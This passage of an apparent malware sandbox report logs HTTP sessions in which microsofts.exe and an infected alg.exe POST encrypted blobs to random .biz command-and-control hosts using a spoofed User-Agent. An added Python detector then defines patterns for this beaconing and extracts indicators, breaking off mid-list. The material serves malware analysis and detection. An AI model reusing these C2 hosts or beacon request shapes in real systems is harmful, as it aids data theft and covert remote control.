                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:14 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=c506c0f85a4cbb7625571620e6645a15|173.254.250.76|1730822654|1730822654|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
105         192.168.2.5  59776        47.129.31.212   80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:04:14.351274014 CET  352  OUT  POST /rwhorjnmac HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:14.351294994 CET  828  OUT  Data Raw: b9 12 79 9e 15 2d d9 aa 30 03 00 00 8c e8 9b c8 27 ea 56 bf a2 b4 bb 74 3c 2d ae e9 b8 3c 05 7a fd f2 60 52 82 4d a0 ae ce 82 a0 a7 f8 6d 35 5a c7 28 70 5f 78 af 16 ec d4 49 45 33 34 71 b8 c8 4f f5 a2 8e 1c 78 fa b0 fd bc dd 0b e4 98 4a c6 ad 8e
Data Ascii: y-0'Vt<-<z`RMm5Z(p_xIE34qOxJ4\`YmDUX^;>.X!u!U|HDtY(Ej>@j-tx]`\K8#*3t2$l~!gCl`#T(x,"DZ>Lv"9O,Y
Nov 5, 2024 17:04:15.799179077 CET  414  IN   HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:15 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=fefb4c39f9cd157dbe003da06f002ef6|173.254.250.76|1730822655|1730822655|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
106         192.168.2.5  59777        13.251.16.150   80                1492  C:\Windows\System32\alg.exe

Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:04:15.062376022 CET  344  OUT  POST /rgh HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:15.062398911 CET  778  OUT  Data Raw: 8b 3d 33 63 0f 03 2b dd fe 02 00 00 80 be 23 2f 56 2b f2 bc a7 25 23 36 e5 f1 70 42 2b 5c fb 55 59 67 32 fe ee 27 d1 a3 7e 78 92 b3 22 4e 1b 8e 0e 2e aa 04 11 d9 9a 30 28 33 2c b8 35 eb f5 16 1f 35 fd 20 8e 26 6c 2a 57 1c 61 60 47 4b 4f 41 a8 56
Data Ascii: =3c+#/V+%#6pB+\UYg2'~x"N.0(3,55 &l*Wa`GKOAVul.N@th?Vy'Y)o&c|Am8#`5j4+|cnBE`{J_J>{S.7.HL~#}jz+)
Nov 5, 2024 17:04:16.478646040 CET  413  IN   HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9d7a78e30a2d4ad3863963a1cd7f1477|173.254.250.76|1730822656|1730822656|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
107         192.168.2.5  59778        18.208.156.248  80                1816  C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp  Bytes transferred  Direction  Data
Nov 5, 2024 17:04:15.842751980 CET  351  OUT  POST /ovwvug HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:15.847057104 CET  828  OUT  Data Raw: 96 a5 93 e3 5a b2 a0 64 30 03 00 00 8c c5 ab 48 26 03 e3 a8 33 4b be 71 9d 79 3f 5e a7 f2 fd 94 cb b6 b6 b6 86 2f 74 1c c9 8c 82 d5 38 24 9c 6d fc 98 c2 c8 85 5e 8f 1a 9b 34 ab 14 75 53 8c b9 53 7b a8 76 eb ca 55 3c 6a 20 28 9a d9 d5 83 8c 19 80
Data Ascii: Zd0H&3Kqy?^/t8$m^4uSS{vU<j (1l*\U?d0MRg#CAF?UvH>wOJLM?$f&xpu7W#y7%Wh${TGm?QXtbok+L!h-m[rxiTr5=II(/
Nov 5, 2024 17:04:16.512398958 CET  417  IN   HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:16 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7f2be767f9777de67ddc17e258f1b92e|173.254.250.76|1730822656|1730822656|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.5 | 59780 | 13.251.16.150 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:16.546449900 CET | 354 | OUT | POST /tgeilwrmlsau HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jdhhbs.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:16.546497107 CET | 828 | OUT | Data Raw: 7b 71 f1 f5 4e 4a b3 0d 30 03 00 00 9b 55 b1 f8 97 cb 4a 04 bc 6a 87 c7 a3 54 26 16 29 ef 4e 18 70 76 c4 09 93 71 9e c5 92 90 f0 e4 88 33 81 16 03 5e 1c c0 b0 86 e9 4e 15 a1 c8 26 fd a2 3a 1e 07 01 4c cd 93 89 93 6b 75 a7 17 72 34 f8 6d e8 c5 45
Data Ascii: {qNJ0UJjT&)Npvq3^N&:Lkur4mEK-mGU9P_VDD[!/&A{lRL`<q_""]6kfw"FqDs-KopJ"pS"q&j=|uj7[{^QUM~
Nov 5, 2024 17:04:18.005286932 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:17 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4ff414d2b5ecdefd62a414e83a79ceb2|173.254.250.76|1730822657|1730822657|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.5 | 59781 | 18.208.156.248 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:17.486206055 CET | 351 | OUT | POST /snkuws HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:17.487410069 CET | 778 | OUT | Data Raw: ed 6f 1a b9 69 5e 5f ee fe 02 00 00 ac 42 38 b4 96 11 1c 1a bc 7e 61 38 90 69 42 cd 06 f3 36 24 65 c9 d4 30 73 0e c3 c9 5c 70 96 87 92 52 56 ce 84 e0 40 d3 ed 84 00 43 00 4b 25 73 0f 30 9a 79 b4 4a 13 4d 3c 42 e8 80 7c 7a 64 95 2f 8f 4f 5b 69 6c
Data Ascii: oi^_B8~a8iB6$e0s\pRV@CK%s0yJM<B|zd/O[ilRwQCb #tB}R|w}%4d<~MSQOxQg8 D?^"x!.P3'([H{eB1|vE|c%?)4Xv
Nov 5, 2024 17:04:18.143543959 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:18 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d354e3a91f93e8ecd82409b075f0fb05|173.254.250.76|1730822658|1730822658|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.5 | 59782 | 34.246.200.160 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:18.252860069 CET | 346 | OUT | POST /x HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mgmsclkyu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:18.252876997 CET | 828 | OUT | Data Raw: f0 21 9c f2 ce 0f 7a a4 30 03 00 00 a1 02 ce e9 7a 49 79 b3 c7 f0 4b d3 d3 e0 65 0a 20 21 21 83 c4 e0 68 c7 aa 84 13 a1 ce f4 7b 82 19 38 81 35 78 19 26 23 fd 3d 91 33 6a 7e 3d c1 bb f6 57 b3 21 51 a0 1a 72 79 ba cd a0 e0 2b 59 3d 5d 95 e1 d3 fa
Data Ascii: !z0zIyKe !!h{85x&#=3j~=W!Qry+Y=]t:57l)(^ZU"njaUbji0ZRCmQ!A)`,+wln_OH9atSt2/1z~[cB];<2GKm#|A('Q@!'d
Nov 5, 2024 17:04:19.223581076 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=21fddca3df215ee12ebfba8f437ac580|173.254.250.76|1730822659|1730822659|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
111 | 192.168.2.5 | 59783 | 18.246.231.120 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:18.913275957 CET | 348 | OUT | POST /hchtqxq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xccjj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:18.913294077 CET | 778 | OUT | Data Raw: 28 19 d8 d3 6d 6f aa 24 fe 02 00 00 1e 27 32 c4 5f 0d 22 51 ff 3a 4b 73 1c 8d be 3f c3 08 87 89 0d 8b f4 6f 9b fc 06 cd 1b 17 7b 59 92 e3 a9 11 78 12 91 33 53 b2 39 70 91 d2 25 9c 2c 2c 46 c6 bf b5 bb 48 16 f2 de 67 5d 91 98 03 7a b6 e9 fa c8 04
Data Ascii: (mo$'2_"Q:Ks?o{Yx3S9p%,,FHg]z%{X}2@X@?wT7GsO&9^o|EVE5BPdmiWqECm:u_xvdz6>F3g?O0\@Q:e^Ws)
Nov 5, 2024 17:04:19.751663923 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:19 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=ef3cedbc6815454db398ec71dbd8c69b|173.254.250.76|1730822659|1730822659|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
112 | 192.168.2.5 | 59784 | 18.141.10.107 | 80 | 1816 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:19.246568918 CET | 345 | OUT | POST /cf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: warkcdu.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:19.246582031 CET | 828 | OUT | Data Raw: f1 e3 1c ee f1 b0 8f 50 30 03 00 00 f4 6d a8 e6 2a 19 0a 64 48 37 4c 49 d1 73 b7 90 5c cd 51 5c fc 5a 97 4a 3b 38 37 24 9c a6 e7 27 33 53 70 23 d3 6a 7c ad f4 8f ec 4b f2 1b 92 e7 b1 0c f0 ae 34 f0 65 4f 39 5c a4 71 e0 6e ec b7 2e fe 04 cc 8b 4a
Data Ascii: P0m*dH7LIs\Q\ZJ;87$'3Sp#j|K4eO9\qn.JW6tI51NSo:;|%vYXwlP#SWXmnc:SQZ#WEck5xqOW` gA9nU{jr&//_TZS
Nov 5, 2024 17:04:20.683882952 CET | 415 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:20 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4e918d45b4c75612e87e3a0ad4fdd37e|173.254.250.76|1730822660|1730822660|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
113 | 192.168.2.5 | 59785 | 44.221.84.105 | 80 | 1492 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:20.544490099 CET | 352 | OUT | POST /qirtwake HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: hehckyov.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:20.544518948 CET | 778 | OUT | Data Raw: 90 45 49 42 f9 dc 4d 1f fe 02 00 00 1d 29 fd b6 5e 0c 45 66 9f 29 4e fe 8d 2d a9 f8 27 2e db b8 b1 66 2e e7 74 a2 5c 11 a4 c6 0d 19 ab ba 35 f9 f7 2f e7 12 0b 4d b9 55 19 9c 17 d2 9e dd d5 b0 66 8f 2b d4 a4 5a a3 af a3 82 d5 ca 67 ee 0d 9b 99 9f
Data Ascii: EIBM)^Ef)N-'.f.t\5/MUf+Zgph\bU1dY-CLB@M~F2D}I!:Q8fN5l<Z{SeyEFuUp*3J[|:fT$a30]0gt,DV5
Nov 5, 2024 17:04:21.218708992 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=0b55db5d20b58f9b372953fc76b9cb02|173.254.250.76|1730822661|1730822661|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 114 | Source IP: 192.168.2.5 | Source Port: 59786 | Destination IP: 13.251.16.150 | Destination Port: 80 | PID: 1816 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:20.707015991 CET | 353 | OUT | POST /lveagfnoqbuq HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gcedd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:20.707015991 CET | 828 | OUT | Data Raw: 3b 21 6f b3 ce 7d 5b 2d 30 03 00 00 18 f7 b7 9f 29 4f ab 23 d7 94 ad 95 c6 96 e0 a4 dd 29 21 6c ad 96 b3 20 ed e1 66 2e fb 01 7b 90 7a fe 6c 51 a2 2b 73 1b 5e 73 8a 50 09 c3 7f 4e a8 0e 08 9a 2c ee eb a5 53 7e 3d 19 d5 bf 26 c8 ab be cb a0 4d c0
Data Ascii: ;!o}[-0)O#)!l f.{zlQ+s^sPN,S~=&MM"?dc:n?@H@Z|5cYM}>Pja=io-|3 zB bN]bhVP)uXe1JC4Yr|CBeRNB&{B!<$1G'lW
Nov 5, 2024 17:04:22.132050037 CET | 413 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=b91718c9633bb62eebc40a3fb0cd928c|173.254.250.76|1730822661|1730822661|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 115 | Source IP: 192.168.2.5 | Source Port: 59788 | Destination IP: 54.244.188.177 | Destination Port: 80 | PID: 1492 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:21.673212051 CET | 355 | OUT | POST /rsstpsksfhdhf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: rynmcq.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 5, 2024 17:04:21.673212051 CET | 778 | OUT | Data Raw: 01 1b cc 28 78 4e aa 6d fe 02 00 00 eb 96 b3 24 db 64 3e aa ac 62 b0 91 b1 82 b3 4b a1 a7 be 5e 88 aa 13 37 ec 00 f5 1a ef ce 21 b0 f1 20 41 ac fe 5d e8 ea 43 8c 92 0a 70 64 c1 d0 08 4a 20 e2 af b6 b7 54 ca 09 63 25 17 28 59 86 50 f8 14 91 cc ab
Data Ascii: (xNm$d>bK^7! A]CpdJ Tc%(YPc3dtp/Pnfl5jj[-m0mmhxOD%RKpQ!o#sJ4:1zA~BZi{SQ;.i"GOd N6=VW,A
Nov 5, 2024 17:04:22.540344000 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9a7067c382c8ea15d35bfd14d8fad94d|173.254.250.76|1730822662|1730822662|0|1|0; path=/; domain=.rynmcq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 116 | Source IP: 192.168.2.5 | Source Port: 59789 | Destination IP: 18.208.156.248 | Destination Port: 80 | PID: 1816 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 17:04:22.155771017 CET | 352 | OUT | POST /knaxcyr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: jwkoeoqns.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Nov 5, 2024 17:04:22.155771017 CET | 828 | OUT | Data Raw: 06 4c a7 c3 dc 77 60 27 30 03 00 00 c1 dd 0c bc b6 df 8a 03 4d b7 35 eb 9a 4e d5 60 0c 64 24 72 82 3d 2d ed e4 f4 11 c3 06 37 62 03 b0 94 c3 36 a8 b5 aa 8d 10 3d 67 d9 4f 3a 69 4f 1f a2 33 9e 64 2a 99 13 12 f4 ad e1 55 8c c6 16 ed 1e 9d 59 09 66
Data Ascii: Lw`'0M5N`d$r=-7b6=gO:iO3d*UYfUt@[]_m_\4oh:=Y.[ex9NU9LZ%HBUKG5gTy76We{5OUD%:\a`yu~0g}
Nov 5, 2024 17:04:22.824342012 CET | 417 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 05 Nov 2024 16:04:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2c91d364c7dde500cd0c22f9d75e5c49|173.254.250.76|1730822662|1730822662|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
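The sessions above share one shape: a POST of a few hundred encrypted bytes from microsofts.exe (or the infected alg.exe) to a short random .biz host and random path, sent with an outdated WeChat/QQBrowser User-Agent and answered by an empty chunked 200 carrying btst/snkz cookies. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that turns those traits into a per-session detector and IoC extractor. Its input is sessions 114 to 116 transcribed into dicts (encrypted POST bodies omitted, cookie values trimmed) plus one constructed benign control; the three-indicator threshold, the 512 to 1024 byte body window and the 5 to 16 character label range are assumptions fitted to this report, not sandbox or Suricata rules.

```python
# Detector for the beaconing shape recorded in the HTTP sessions above; each session is a dict with
# the table columns (id, dst, dport, pid, process) plus raw request and response text.
import re
from typing import Dict, List

# User-Agent string reused verbatim by every beacon in this report.
BEACON_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")
# DGA-style label: lowercase letters only, 5 to 16 chars (gcedd, rynmcq, /rsstpsksfhdhf). Window is an assumption.
RANDOM_LABEL = re.compile(r"^[a-z]{5,16}$")


def http_msg(start: str, headers: Dict[str, str], body: str = "") -> str:
    """Serialise an HTTP/1.1 message; used only to build the sample records below."""
    return start + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers.items()) + "\r\n" + body


def parse_http(raw: str) -> dict:
    """Split an HTTP/1.1 message into start line, lower-cased header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # a repeated header keeps its last value
    return {"start": start, "headers": headers, "body": body}


def beacon_indicators(session: dict) -> List[str]:
    """Return the beaconing traits a session exhibits; an empty list means it looks benign."""
    req, resp = parse_http(session["request"]), parse_http(session["response"])
    h = req["headers"]
    method, path, _ = req["start"].split(" ", 2)
    host = h.get("host", "")
    label, _, tld = host.rpartition(".")
    hits = []
    if method == "POST" and tld == "biz" and RANDOM_LABEL.match(label):
        hits.append(f"POST to DGA-style host {host}")
    if RANDOM_LABEL.match(path.lstrip("/")):
        hits.append(f"random URI path {path}")
    if h.get("user-agent") == BEACON_UA:
        hits.append("fixed WeChat/QQBrowser User-Agent")
    clen = int(h.get("content-length", "0"))
    if 512 <= clen <= 1024 and "content-type" not in h:  # encrypted blob sent without a media type
        hits.append(f"untyped binary body of {clen} bytes")
    if resp["start"].startswith("HTTP/1.1 200") and resp["body"].startswith("0\r\n") and "set-cookie" in resp["headers"]:
        hits.append("empty chunked 200 with tracking cookie")
    proc = session["process"].lower()
    # alg.exe (Application Layer Gateway service) does not originate HTTP on its own; %TEMP% binaries are suspect too.
    if proc.endswith("\\alg.exe") or "\\appdata\\local\\temp\\" in proc:
        hits.append(f"unexpected HTTP client {session['process']}")
    return hits


def scan(sessions: List[dict], threshold: int = 3) -> Dict[int, List[str]]:
    """Map session id to its indicators for every session reaching the (assumed) threshold."""
    flagged = {}
    for s in sessions:
        hits = beacon_indicators(s)
        if len(hits) >= threshold:
            flagged[s["id"]] = hits
    return flagged


def extract_iocs(sessions: List[dict]) -> Dict[str, set]:
    """Hosts, URI paths, destination IPs and client processes of the flagged sessions."""
    flagged_ids = scan(sessions)
    flagged = [s for s in sessions if s["id"] in flagged_ids]
    reqs = [parse_http(s["request"]) for s in flagged]
    return {"hosts": {r["headers"].get("host", "") for r in reqs},
            "paths": {r["start"].split(" ")[1] for r in reqs},
            "dst_ips": {s["dst"] for s in flagged},
            "processes": {s["process"] for s in flagged}}


def _beacon(sid: int, dst: str, pid: int, process: str, path: str, host: str, clen: int) -> dict:
    """Rebuild one report session (encrypted POST body omitted, cookie value trimmed)."""
    req_hdrs = {"Cache-Control": "no-cache", "Connection": "Keep-Alive", "Pragma": "no-cache",
                "Host": host, "User-Agent": BEACON_UA, "Content-Length": str(clen)}
    resp_hdrs = {"Server": "nginx", "Content-Type": "text/html", "Transfer-Encoding": "chunked", "Connection": "close",
                 "Set-Cookie": f"btst=...; path=/; domain=.{host}; HttpOnly; SameSite=Lax;"}
    return {"id": sid, "dst": dst, "dport": 80, "pid": pid, "process": process,
            "request": http_msg(f"POST {path} HTTP/1.1", req_hdrs),
            "response": http_msg("HTTP/1.1 200 OK", resp_hdrs, "0\r\n\r\n")}


# Sessions 114 to 116 transcribed from the report, plus one constructed benign control that must not be flagged.
SESSIONS = [
    _beacon(114, "13.251.16.150", 1816, r"C:\Users\user\AppData\Local\Temp\microsofts.exe", "/lveagfnoqbuq", "gcedd.biz", 828),
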